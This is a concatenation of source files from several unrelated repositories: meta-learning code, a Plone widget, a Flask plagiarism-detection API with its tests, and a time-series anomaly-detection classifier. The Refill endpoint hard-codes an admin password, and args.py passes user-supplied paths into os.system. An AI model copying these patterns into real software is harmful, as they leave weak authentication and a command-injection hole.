np.eye(len(chars))[np.reshape(np.array(train_y),-1).astype(int)] test_x = np.array(test_x) test_y = np.eye(len(chars))[np.reshape(np.array(test_y),-1).astype(int)] train_x = np.reshape(train_x,[-1,28,28,1]) test_x = np.reshape(test_x,[-1,28,28,1]) if shuffle: train_x,train_y = unison_shuffled_copies(train_x,train_y) test_x,test_y = unison_shuffled_copies(test_x,test_y) meta_train_x.append(train_x) meta_train_y.append(train_y) meta_test_x.append(test_x) meta_test_y.append(test_y) yield 
meta_train_x,meta_train_y,meta_test_x,meta_test_y def getOrder(minClass,maxClass,mb_size,number_chars=1200): # gives a list integers between minClass and maxClass that sum up to 1200, lens = [] sums = 0 while sums<=number_chars-minClass*mb_size: maxV = int((number_chars-sums)/mb_size)+1 n=np.random.randint(minClass,min(maxV,maxClass)) lens += [n]*mb_size sums = sums+(n*mb_size) return lens def readImg(path,size=[28,28],rgb=False): img = cv2.imread(path) img = cv2.resize(img,(size[0],size[1])).astype(float) if np.max(img)>1.0: img /= 255. if not rgb: return img[:,:,:1] else: if len(img.shape)==3: if img.shape[-1]!=3: print('ASFASFASFAS') print(img.shape) print(path) return img else: return np.reshape([img,img,img],[size[0],size[1],3]) def unison_shuffled_copies(a, b): assert len(a) == len(b) p = np.random.permutation(len(a)) return a[p], b[p] def loadImgDir(path,size,rgb): imgs = [] for img in os.listdir(path): imgs.append(readImg(path+"/"+img,size,rgb)) return imgs
Python
275
35.080002
166
/data_gen/omni_gen.py
0.499195
0.490342
radrumond/hidra
refs/heads/master
""" Command-line argument parsing. """ import argparse #from functools import partial import time import tensorflow as tf import json import os def boolean_string(s): if s not in {'False', 'True'}: raise ValueError('Not a valid boolean string') return s == 'True' def argument_parser(): """ Get an argument parser for a training script. """ file_time = int(time.time()) parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--arch', help='name architecture', default="fcn", type=str) parser.add_argument('--seed', help='random seed', default=0, type=int) parser.add_argument('--name', help='name add-on', type=str, default='Model_config-'+str(file_time)) parser.add_argument('--dataset', help='data set to evaluate on', type=str, default='Omniglot') parser.add_argument('--data_path', help='path to data folder', type=str, default='/home/') parser.add_argument('--config', help='json config file', type=str, default=None) parser.add_argument('--checkpoint', help='checkpoint directory', default='model_checkpoint') parser.add_argument('--test', help='Testing or Not', action='store_true') parser.add_argument('--testintrain', help='Testing during train or Not', action='store_true') parser.add_argument('--min_classes', help='minimum number of classes for n-way', default=2, type=int) parser.add_argument('--max_classes', help='maximum (excluded) number of classes for n-way', default=2, type=int) parser.add_argument('--ttrain_shots', help='number of examples per class in meta train', default=5, type=int) parser.add_argument('--ttest_shots', help='number of examples per class in meta test', default=15, type=int) parser.add_argument('--etrain_shots', help='number of examples per class in meta train', default=5, type=int) parser.add_argument('--etest_shots', help='number of examples per class in meta test', default=15, type=int) parser.add_argument('--train_inner_K', help='number of inner gradient steps during meta training', 
default=5, type=int) parser.add_argument('--test_inner_K', help='number of inner gradient steps during meta testing', default=5, type=int) parser.add_argument('--learning_rate', help='Adam step size for inner training', default=0.4, type=float) parser.add_argument('--meta_step', help='meta-training step size', default=0.01, type=float) parser.add_argument('--meta_batch', help='meta-training batch size', default=1, type=int) parser.add_argument('--meta_iters', help='meta-training iterations', default=70001, type=int) parser.add_argument('--eval_iters', help='meta-training iterations', default=2000, type=int) parser.add_argument('--step', help='Checkpoint step to load', default=59999, type=float) # python main_emb.py --meta_step 0.005 --meta_batch 8 --learning_rate 0.3 --test --checkpoint Model_config-1568818723 args = vars(parser.parse_args()) #os.system("mkdir -p " + args['checkpoint']) if args['config'] is None: args['config'] = f"{args['checkpoint']}/{args['name']}/{args['name']}.json" print(args['config']) # os.system("mkdir -p " + f"{args['checkpoint']}") os.system("mkdir -p " + f"{args['checkpoint']}/{args['name']}") with open(args['config'], 'w') as write_file: print("Json Dumping...") json.dump(args, write_file) else: with open(args['config'], 'r') as open_file: args = json.load(open_file) return parser def train_kwargs(parsed_args): """ Build kwargs for the train() function from the parsed command-line arguments. """ return { 'min_classes': parsed_args.min_classes, 'max_classes': parsed_args.max_classes, 'train_shots': parsed_args.ttrain_shots, 'test_shots': parsed_args.ttest_shots, 'meta_batch': parsed_args.meta_batch, 'meta_iters': parsed_args.meta_iters, 'test_iters': parsed_args.eval_iters, 'train_step' : parsed_args.step, 'name': parsed_args.name, } def test_kwargs(parsed_args): """ Build kwargs for the train() function from the parsed command-line arguments. 
""" return { 'eval_step' : parsed_args.step, 'min_classes': parsed_args.min_classes, 'max_classes': parsed_args.max_classes, 'train_shots': parsed_args.etrain_shots, 'test_shots': parsed_args.etest_shots, 'meta_batch': parsed_args.meta_batch, 'meta_iters': parsed_args.eval_iters, 'name': parsed_args.name, }
Python
97
50.051548
124
/args.py
0.616845
0.60715
radrumond/hidra
refs/heads/master
import numpy as np import tensorflow as tf from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen def test(m, data_sampler, eval_step, min_classes, max_classes, train_shots, test_shots, meta_batch, meta_iters, name): sess = tf.Session() sess.run(tf.global_variables_initializer()) losses=[] temp_yp = [] aps = [] buffer = [] lossesB=[] train_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"test") print("TEST MODE") m.loadWeights(sess, name, step = str(int(eval_step)), model_name=name+".ckpt") for i in range(meta_iters): xb1,yb1,xb2,yb2 = next(train_gen) num_l = [len(np.unique(np.argmax(yb1,axis=-1)))] if m.maml_n == 2: sess.run(m.init_assign, feed_dict={m.label_n:[5]}) l,vals,ps=sess.run([m.test_train_loss,m.test_val_losses,m.val_predictions],feed_dict={m.train_xb: xb1, m.train_yb: yb1, m.val_xb:xb2, m.val_yb:yb2, m.label_n:num_l}) losses.append(vals) lossesB.append(vals) buffer.append(l) true_vals = np.argmax(yb2,axis=-1) all_accs = [] for pred_epoch in range(len(ps)): all_accs.append(np.mean(np.argmax(ps[pred_epoch],axis=-1)==true_vals)) temp_yp.append(all_accs) # if i%1==0: if i%50==0: print(f"({i}/{meta_iters})") print(f"Final: TLoss {np.mean(buffer)}, VLoss {np.mean(lossesB,axis=0)}", f"Accuracy {np.mean(temp_yp,axis=0)}" ) print(f"Final: TLoss {np.mean(buffer)}-{np.std(buffer)}, VLoss {np.mean(lossesB,axis=0)}-{np.std(lossesB,axis=0)}", f"Accuracy {np.mean(temp_yp,axis=0)}-{np.std(temp_yp,axis=0)}" )
Python
54
39.222221
184
/test.py
0.481822
0.469397
radrumond/hidra
refs/heads/master
## Created by Rafael Rego Drumond and Lukas Brinkmeyer # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen from archs.fcn import Model as mfcn from archs.hydra import Model as mhyd from train import * from test import * from args import argument_parser, train_kwargs, test_kwargs import random args = argument_parser().parse_args() random.seed(args.seed) t_args = train_kwargs(args) e_args = test_kwargs (args) print("########## argument sheet ########################################") for arg in vars(args): print (f"#{arg:>15} : {str(getattr(args, arg))} ") print("##################################################################") print("Loading Data...") if args.dataset in ["Omniglot", "omniglot", "Omni", "omni"]: loader = OmniChar_Gen (args.data_path) isMIN = False shaper = [28,28,1] elif args.dataset in ["miniimagenet", "MiniImageNet", "mini"]: loader = MiniImgNet_Gen(args.data_path) isMIN = True shaper = [84,84,3] else: raise ValueError("INVALID DATA-SET NAME!") print("Building Model...") if args.arch == "fcn"or args.arch == "maml": print("SELECTED: MAML") m = mfcn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) mt = mfcn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) #elif args.arch == "rnn": # m = mrnn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.min_classes) elif args.arch == "hydra" or args.arch == "hidra": print("SELECTED: HIDRA") m = mhyd (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) mt = mhyd (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) else: raise ValueError("INVALID Architecture NAME!") 
mode = "train" if args.test: mode = "test" print("Starting Test Step...") mt.build (K = args.test_inner_K, meta_batchsz = args.meta_batch, mode=mode) test (mt, loader, **e_args) else: modeltest = None if args.testintrain: mt.build (K = args.test_inner_K, meta_batchsz = args.meta_batch, mode="test") modeltest = mt print("Starting Train Step...") m.build (K = args.train_inner_K, meta_batchsz = args.meta_batch, mode=mode) train(m, modeltest, loader, **t_args)
Python
61
41.098362
133
/main.py
0.647975
0.641745
Rhaptos/Products.Lensmaker
refs/heads/master
from Products.Archetypes.public import StringWidget from Products.Archetypes.Registry import registerWidget class ColorWidget(StringWidget): _properties = StringWidget._properties.copy() _properties.update({ 'macro' : "colorchooser", }) registerWidget(ColorWidget, title='Color', description='Like StringWidget, stores the hex value of a color.', used_for=('Products.Archetypes.Field.StringField',) ) from Products.validation import validation from Products.validation.validators import RegexValidator validation.register(RegexValidator('isHexColor', r'^[0-9a-fA-F]{6}$', title='', description='', errmsg='is not a hexadecimal color code.'))
Python
21
34.333332
95
/widgets.py
0.685061
0.681023
tiwarim/PlagiarismCheck
refs/heads/master
# importing libraries from sys_utils import * # Resource Detect """ Resource Detect takes input on a POST protocol and returns similarity ratio     Parameters:      namepassimg: contains username, password of the user and two string documents <JSON>     Returns:         retJson: contains status code and message <JSON> """ class Detect(Resource): def post(self): namepasstext = request.get_json() username = namepasstext["username"] password = namepasstext["password"] text1 = namepasstext["text1"] text2 = namepasstext["text2"] if not userExists(username): retJson = { "statuscode" : 301, "message" : "User does not exit" } return jsonify(retJson) correct_pw = verifypw(username, password) if not correct_pw: retJson = { "statuscode" : 302, "message" : "Invalid password" } return jsonify(retJson) num_tokens = countTokens(username) if num_tokens <= 0 : retJson = { "statuscode" : 303, "message" : "Out of tokens, please refill" } return jsonify(retJson) # calculate edit distance. We use the pretained spacy model to predict the similarity of two strings goven to us nlp = spacy.load('en_core_web_sm') # loaded the spacy model text1 = nlp(text1) # change from string to natural language processing model sentence text2 = nlp(text2) # ratio of similarity between 0 and 1 for the text1 and text2. closer the one, more the similarity # 0 = text1 and text2 are very different and 1 = text1 and text2 are almost or entirely similar ratio = text1.similarity(text2) retJson = { "statuscode" : 200, "message" : "Similarity ration calculated", "similarity ratio" : ratio } users.update({ "username":username, }, { "$set": { "tokens" : num_tokens -1 } } ) return jsonify(retJson)
Python
69
31.072464
120
/src/Backend/web/Detect.py
0.554903
0.539539
tiwarim/PlagiarismCheck
refs/heads/master
# importing libraries from sys_utils import * # Resource refill """ Resource Refill takes input on a POST protocol and adds to the existing tokens     Parameters:      namepassref: contains username, admin password and refill amount <JSON>     Returns:         retJson: contains status code and message <JSON> """ class Refill(Resource): def post(self): namepassref = request.get_json() username = namepassref["username"] admin_password = namepassref["admin_password"] refill_amt = namepassref["refill_amt"] if not userExists(username): retJson = { "statuscode" : 301, "message" : "User does not exit" } return jsonify(retJson) correct_admin_password = "Admiral123" if not correct_admin_password == admin_password: retJson = { "statuscode" : 304, "message" : "Invalid admin password" } return jsonify(retJson) num_tokens = countTokens(username) users.update({ "username":username, }, { "$set": { "tokens" : num_tokens + refill_amt } } ) retJson = { "statuscode" : 200, "message" : "Tokens refilled successfully" } return jsonify(retJson)
Python
51
26.647058
83
/src/Backend/web/Refill.py
0.534752
0.528369
tiwarim/PlagiarismCheck
refs/heads/master
# importing libraries from sys_utils import * # Resource Register """ Resource Register takes input on a POST protocol and creates new accounts     Parameters:      namepass: contains username and password of the user <JSON>     Returns:         retJson: contains status code and message <JSON> """ class Register(Resource): def post(self): namepass = request.get_json() username = namepass["username"] password = namepass["password"] # check if the user already exists if userExists(username): retJson = { "statuscode" : 301, "message" : "User Already exists" } return jsonify(retJson) hashedpw = bcrypt.hashpw(password.encode('utf8'), bcrypt.gensalt()) users.insert({ "username" : username, "password" : hashedpw, "tokens" : 6 }) retJson = { "statuscode" : 200, "message" : "you successfuly signed up for the api" } return jsonify(retJson)
Python
36
28.916666
78
/src/Backend/web/Register.py
0.566388
0.55896
tiwarim/PlagiarismCheck
refs/heads/master
import requests import json from time import process_time def test_FR1_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "ghtdsss", "password" : "12356" }) json_response = response.json() assert json_response['statuscode'] == 200 def test_FR1_2(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "fffff", "password" : "123" }) json_response = response.json() assert json_response['statuscode'] == 200 def test_FR1_3(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "&%$!@&", "password" : "123" }) json_response = response.json() assert json_response['statuscode'] == 200 def test_FR2_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "fffff", "password" : "123" }) json_response = response.json() assert json_response['statuscode'] == 301 def test_FR2_2(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "fffff", "password" : "123" }) json_response = response.json() assert json_response['statuscode'] == 200 def test_FR3_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "www", "text2" : "www" }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["similarity ratio"] == 100 def test_FR3_2(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "gggg", "password" : "123", "text1" : "www", "text2" : "www" }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["similarity ratio"] == 100 def test_FR3_3(): response = 
requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "fffff", "password" : "123", "text1" : "www", "text2" : "www" }) json_response = response.json() assert json_response['statuscode'] == 303 def test_FR3_4(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "1234", "text1" : "www", "text2" : "www" }) json_response = response.json() assert json_response['statuscode'] == 302 def test_FR4_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/refill', json={ "username" : "wsx", "admin_password" : "Admiral123", "refill_amt" : 10 }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["tokens left"] == 226 def test_FR4_2(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/refill', json={ "username" : "weesx", "admin_password" : "Admiral123", "refill_amt" : 10 }) json_response = response.json() assert json_response['statuscode'] == 301 def test_FR4_3(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/refill', json={ "username" : "wsx", "admin_password" : "Admiral12345", "refill_amt" : 10 }) json_response = response.json() assert json_response['statuscode'] == 304 def test_FR4_4(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/refill', json={ "username" : "wsx", "admin_password" : "Admiral123", "refill_amt" : 10 }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["tokens left"] == 20 def test_NFR2_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/register', json={ "username" : "wssdxwda", "password" : "123" }) json_response = response.json() assert json_response['statuscode'] == 200 def test_NFR2_2(): response = 
requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "w", "text2" : "w" }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["similarity ratio"] == 100 def test_NFR2_3(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/refill', json={ "username" : "123", "admin_password" : "Admiral123", "refill_amt" : 5 }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["tokens left"] == 31 def test_NFR3_1(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "我是谁", "text2" : "我是谁" }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["similarity ratio"] == 100 def test_NFR3_2(): response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "😀", "text2" : "😀" }) json_response = response.json() assert json_response['statuscode'] == 200 assert json_response["similarity ratio"] == 100 def test_NFR4_1(): t1_start = process_time() response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "www", "text2" : "www" }) json_response = response.json() t1_stop = process_time() Elapsed_time = t1_stop - t1_start assert Elapsed_time <= 0.1 def test_NFR4_2(): t1_start = process_time() response = requests.post('http://ec2-3-134-112-214.us-east-2.compute.amazonaws.com:8000/detect', json={ "username" : "wer", "password" : "123", "text1" : "微服私访被u饿不饿不吃速测", "text2" : "金额发i俄服务i脑残粉i为访问" }) json_response = response.json() t1_stop = process_time() Elapsed_time = t1_stop - t1_start assert Elapsed_time <= 0.1
Python
205
30.790243
109
/src/Testing/Unit_Test.py
0.616754
0.537435
sebastianden/alpaca
refs/heads/master
from alpaca import Alpaca from utils import to_time_series_dataset, to_dataset, split_df, TimeSeriesResampler import time import numpy as np import pandas as pd from sklearn.pipeline import Pipeline max_sample = 20 for dataset in ['uc2']: if dataset == 'uc1': X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'), index_column='run_id', feature_columns=['fldPosition', 'fldCurrent'], target_name='target') y = np.array(y) # Length of timeseries for resampler and cnn sz = 38 # Number of channels for cnn num_channels = len(X[0][0]) # Number of classes for cnn num_classes = np.unique(y).shape[0] if dataset == 'uc2': X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'), index_column='run_id', feature_columns=['position', 'force'], target_name='label') y = np.array(y) # Length of timeseries for resampler and cnn sz = 200 # Number of channels for cnn num_channels = len(X[0][0]) # Number of classes for cnn num_classes = np.unique(y).shape[0] resampler = TimeSeriesResampler(sz=sz) alpaca = Pipeline([('resampler', resampler), ('classifier', Alpaca())]) alpaca.fit(X, y, classifier__stacked=False, classifier__n_clusters=200) # Measure time for single sample processing t = [] for i in range(1, max_sample+1): for j in range(10): rand = np.random.randint(2000) sample = np.transpose(to_time_series_dataset(X[rand]), (2, 0, 1)) start = time.process_time() for k in range(100): for l in range(i): y_pred_bin, y_pred = alpaca.predict(sample, voting='veto') end = time.process_time() t.append([i, (end-start)/100, 'single']) # Measure time for batch processing of multiple sample numbers for i in range(1, max_sample+1): for j in range(10): rand = np.random.randint(2000) if i == 1: sample = np.transpose(to_time_series_dataset(X[rand]), (2, 0, 1)) else: sample = to_dataset(X[rand:rand+i]) start = time.process_time() for k in range(100): y_pred_bin, y_pred = alpaca.predict(sample, voting='veto') end = time.process_time() t.append([i, (end-start)/100, 'batch']) df = pd.DataFrame(t, 
columns=['Sample Number', 'Time', 'Type']) df.to_csv("..\\results\\Time_"+dataset+".csv")
Python
70
37.357143
84
/src/test_time.py
0.540721
0.519896
sebastianden/alpaca
refs/heads/master
from alpaca import Alpaca from utils import to_time_series_dataset, split_df, TimeSeriesResampler, confusion_matrix from sklearn.model_selection import train_test_split from sklearn.utils import shuffle from sklearn.pipeline import Pipeline import time import numpy as np import pandas as pd # Variables repetitions = 2 if __name__ == "__main__": # For both datasets for dataset in ['uc1']: print("Dataset: ", dataset) results = [] #timing = [] #outliers = [] if dataset == 'uc1': X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'), index_column='run_id', feature_columns=['fldPosition', 'fldCurrent'], target_name='target') # Length of timeseries for resampler and cnn sz = [38,41] # Number of channels for cnn num_channels = len(X[0][0]) # Number of classes for cnn num_classes = np.unique(y).shape[0] elif dataset == 'uc2': X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'), index_column='run_id', feature_columns=['position', 'force'], target_name='label') # Length of timeseries for resampler and cnn sz = [200] # Number of channels for cnn num_channels = len(X[0][0]) # Number of classes for cnn num_classes = np.unique(y).shape[0] # For each repetition for r in range(repetitions): print("Repetition #", r) # For each resampling length for s in sz: print("Resampling size:", s) t_start = time.time() # Shuffle for Keras X, y = shuffle(X, y, random_state=r) # Turn y to numpy array y = np.array(y) # Split into train and test sets X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=r) alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=s)), ('classifier', Alpaca())]) alpaca.fit(X_train, y_train, classifier__stacked=False, classifier__n_clusters=200) # Prediction y_pred_bin, y_pred = alpaca.predict(X_test, voting="veto") y_test_bin = np.copy(y_test) y_test_bin[y_test_bin > 0] = 1 # BINARY RESULTS (AD + ENSEMBLE) tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_bin).ravel() # Append overall error results.append([s, r, 
'err_bin', (fp + fn) / (tn + fp + fn + tp)]) # Append false negative rate results.append([s, r, 'fnr_bin', fn / (fn + tp)]) # Append false positive rate results.append([s, r, 'fpr_bin', fp / (fp + tn)]) # CLASSIFIER RESULTS y_pred_clf = np.copy(y_pred) y_pred_clf[y_pred_clf != 0] = 1 # Also turn classifier predictions to binary for cfm tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_clf).ravel() # Append overall error results.append([s, r, 'err_ens', (fp + fn) / (tn + fp + fn + tp)]) # Append false negative rate results.append([s, r, 'fnr_ens', fn / (fn + tp)]) # Append false positive rate results.append([s, r, 'fpr_ens', fp / (fp + tn)]) """ # TIMING sample = np.transpose(to_time_series_dataset(X_test[0]), (2, 0, 1)) start = time.time() for i in range(100): alpaca.predict(sample, voting='veto') end = time.time() timing.append([(end - start) * 10, s]) # in ms # SAVE OUTLIERS (with y_pred,y_pred_bin, y_true) idx = np.where(y_test_bin != y_pred_bin) # Flattened curves for i in idx[0]: outliers.append([X_test[i], y_pred[i], y_test[i], y_pred_bin[i], y_test_bin[i]]) """ t_end = time.time() print("Substest finished, duration ",(t_end-t_start)) # SAVE ALL RESULTS PER DATASET df = pd.DataFrame(results, columns=['resampling', 'test', 'metric', 'value']) df.to_csv("..\\results\\Test"+dataset+".csv") #df = pd.DataFrame(timing, columns=['time', 'resampling']) #df.to_csv("..\\results\\Timing"+dataset+".csv") #df = pd.DataFrame(outliers, columns=['sample', 'y_pred', 'y_test', 'y_pred_bin', 'y_test_bin']) #df.to_pickle("..\\results\\Outliers"+dataset+".pkl") #plot_confusion_matrix(y_test_bin.astype(int), y_pred_bin.astype(int), np.array(["0", "1"]), cmap=plt.cm.Blues) #plt.show() #plot_confusion_matrix(y_test.astype(int), y_pred.astype(int), np.array(["0", "1", "2", "3", "?"]), cmap=plt.cm.Greens) #plt.show()
Python
124
41.919353
123
/src/test_use_case.py
0.484695
0.476432
sebastianden/alpaca
refs/heads/master
import numpy as np import pandas as pd from utils import split_df, TimeSeriesResampler, plot_confusion_matrix, Differentiator from alpaca import Alpaca from sklearn.model_selection import train_test_split from sklearn.pipeline import Pipeline import matplotlib.pyplot as plt if __name__ == "__main__": """ IMPORT YOUR DATA HERE X, y = DEFINE RESAMPLING LENGTH IF NEEDED sz = """ # Turn y to numpy array y = np.array(y) # Split into train and test sets X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y, random_state=42) # Pipeline example alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=sz)),('alpaca', Alpaca())]) alpaca.fit(X_train, y_train) """ # Example with additional channel derived from channel 0 alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=sz)), ('differentiator',Differentiator(channel=0)), ('alpaca', Alpaca())]) """ y_pred_bin_veto, y_pred_veto = alpaca.predict(X_test, voting="veto") y_pred_bin_dem, y_pred_dem = alpaca.predict(X_test, voting="democratic") y_pred_bin_meta_dtc, y_pred_meta_dtc = alpaca.predict(X_test, voting="meta_dtc") y_pred_bin_meta_svc, y_pred_meta_svc = alpaca.predict(X_test, voting="meta_svc") # Store all results in a dataframe y_pred_indiv = np.column_stack((y_pred_bin_veto, y_pred_veto,y_pred_bin_dem, y_pred_dem, y_pred_bin_meta_dtc, y_pred_meta_dtc, y_pred_bin_meta_svc, y_pred_meta_svc, y_test)).astype(int) df_results = pd.DataFrame(y_pred_indiv, columns = ['y_pred_bin_veto', 'y_pred_veto','y_pred_bin_dem', 'y_pred_dem', 'y_pred_bin_meta_dtc','y_pred_meta_dtc', 'y_pred_bin_meta_svc', 'y_pred_meta_svc', 'y_true']) df_results.to_csv("results\\y_pred_total.csv",index=False) print("TEST FINISHED SUCCESSFULLY")
Python
46
43.152172
113
/src/main.py
0.607776
0.604823
sebastianden/alpaca
refs/heads/master
import warnings warnings.simplefilter(action='ignore') import pickle import pandas as pd import numpy as np from utils import TimeSeriesScalerMeanVariance, Flattener, Featuriser, plot_dtc from sklearn.pipeline import Pipeline from sklearn.model_selection import StratifiedKFold from sklearn.model_selection import GridSearchCV from sklearn.metrics import roc_curve, auc from sklearn.tree import DecisionTreeClassifier from sklearn.svm import SVC from sklearn.base import ClassifierMixin, BaseEstimator, clone from tslearn.clustering import TimeSeriesKMeans from tslearn.neighbors import KNeighborsTimeSeriesClassifier from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Conv1D, Dense, MaxPooling1D, Flatten from tensorflow.keras.wrappers.scikit_learn import KerasClassifier from IPython.display import SVG from tensorflow.keras.utils import model_to_dot from tensorflow.keras.utils import plot_model class Alpaca(ClassifierMixin): """ A learning product classification algorithm. """ def __init__(self): self.anomaly_detection = AnomalyDetection() self.classifier = Classifier() def fit(self, X, y, stacked=True): """ Fit the algorithm according to the given training data. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Training samples. y : array-like of shape (n_samples,) True labels for X. 
stacked: bool If true train a meta classifier on kfold CV predictions of the level 1 classifiers Returns ------- self: object Fitted model """ # Fit anomaly detection # Do GridSearch to get best model param_grid = {'n_clusters': [10,50,100,200]} grid = GridSearchCV(self.anomaly_detection, param_grid, cv=5, refit=True, verbose=2, n_jobs=-1) grid.fit(X, y) # Save results df_results = pd.DataFrame.from_dict(data=grid.cv_results_) df_results.to_csv("results\\ad.csv",index=False) print(grid.best_params_) # Take best model self.anomaly_detection = grid.best_estimator_ # Save the model with open("models\\ad.pkl", 'wb') as file: pickle.dump(self.anomaly_detection, file) # Fit ensemble classifier self.classifier.fit(X, y, stacked) return self def predict(self, X, voting): """ Perform a classification on samples in X. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Test samples. voting: string Voting scheme to use Returns ------- y_pred: array, shape (n_samples,) Predictions from ensemble with suggested class labels y_pred_bin: array, shape (n_samples,) Combined binary predictions """ # Class predictions of ensemble y_pred, y_pred_ens = self.classifier.predict(X, voting=voting) # Binary predictions of anomaly detector y_pred_ad = self.anomaly_detection.predict(X) # Save individual predictions y_pred_indiv = np.column_stack((y_pred_ens, y_pred_ad)).astype(int) df_results = pd.DataFrame(y_pred_indiv, columns = ['y_pred_dtc','y_pred_svc','y_pred_cnn','y_pred_ad']) df_results.to_csv("results\\y_pred_indiv.csv",index=False) # Overwrite the entries in y_pred_knn with positive, where ensemble decides positive y_pred_bin = np.where(y_pred != 0, 1, y_pred_ad) return y_pred_bin, y_pred class AnomalyDetection(ClassifierMixin, BaseEstimator): """ Anomaly detection with 1-NN and automatic calculation of optimal threshold. 
""" def __init__(self, n_clusters=200): self.knn = KNeighborsTimeSeriesClassifier(n_neighbors=1, weights='uniform', metric='euclidean', n_jobs=-1) self.d = None self.n_clusters = n_clusters def fit(self, X, y): """ Fit the algorithm according to the given training data. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Training samples. y : array-like of shape (n_samples,) True labels for X. Returns ------- self: object Fitted model """ # Fit anomaly detection knn over k-means centroids X_good = X[np.where(y == 0)] X_bad = X[np.where(y != 0)] km = TimeSeriesKMeans(n_clusters=self.n_clusters, metric="euclidean", max_iter=100, random_state=0, n_jobs=-1).fit(X_good) self.knn.fit(km.cluster_centers_, np.zeros((self.n_clusters,))) # Calculate distances to all samples in good and bad d_bad, _ = self.knn.kneighbors(X_bad) d_good, _ = self.knn.kneighbors(X_good) # Calculate ROC y_true = np.hstack((np.zeros(X_good.shape[0]), np.ones(X_bad.shape[0]))) y_score = np.vstack((d_good, d_bad)) fpr, tpr, thresholds = roc_curve(y_true, y_score, pos_label=1) # Determine d by Youden index self.d = thresholds[np.argmax(tpr - fpr)] return self def predict(self, X): """ Perform a classification on samples in X. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Test samples. Returns ------- y_pred: array, shape (n_samples,) Predictions """ # Binary predictions of anomaly detector y_pred = np.squeeze(np.where(self.knn.kneighbors(X)[0] < self.d, 0, 1)) return y_pred class Classifier(ClassifierMixin): """ Classifier part with ensemble of estimators. 
